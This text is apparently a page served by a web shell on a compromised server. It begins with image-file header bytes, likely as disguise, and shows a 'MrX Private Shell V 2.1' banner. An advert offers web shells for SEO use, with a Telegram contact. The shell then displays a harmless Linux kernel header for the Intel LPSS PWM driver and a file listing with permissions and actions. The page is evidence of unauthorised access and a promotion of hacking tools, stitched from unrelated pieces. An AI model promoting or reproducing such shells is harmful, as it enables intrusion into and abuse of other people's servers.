����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
/* SPDX-License-Identifier: GPL-2.0-only */
/* Intel Low Power Subsystem PWM controller driver */
#ifndef __PLATFORM_DATA_X86_PWM_LPSS_H
#define __PLATFORM_DATA_X86_PWM_LPSS_H
#include <linux/types.h>
struct device;
struct pwm_lpss_chip;
struct pwm_lpss_boardinfo {
unsigned long clk_rate;
unsigned int npwm;
unsigned long base_unit_bits;
/*
* Some versions of the IP may stuck in the state machine if enable
* bit is not set, and hence update bit will show busy status till
* the reset. For the rest it may be otherwise.
*/
bool bypass;
/*
* On some devices the _PS0/_PS3 AML code of the GPU (GFX0) device
* messes with the PWM0 controllers state,
*/
bool other_devices_aml_touches_pwm_regs;
};
struct pwm_lpss_chip *devm_pwm_lpss_probe(struct device *dev, void __iomem *base,
const struct pwm_lpss_boardinfo *info);
#endif /* __PLATFORM_DATA_X86_PWM_LPSS_H */
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| apple.h | File | 248 B | 0644 |
|
| asus-wmi.h | File | 4.07 KB | 0644 |
|
| clk-lpss.h | File | 425 B | 0644 |
|
| clk-pmc-atom.h | File | 1020 B | 0644 |
|
| intel-spi.h | File | 621 B | 0644 |
|
| intel_pmc_ipc.h | File | 2.26 KB | 0644 |
|
| nvidia-wmi-ec-backlight.h | File | 2.83 KB | 0644 |
|
| p2sb.h | File | 575 B | 0644 |
|
| pmc_atom.h | File | 4.32 KB | 0644 |
|
| pwm-lpss.h | File | 897 B | 0644 |
|
| soc.h | File | 1.25 KB | 0644 |
|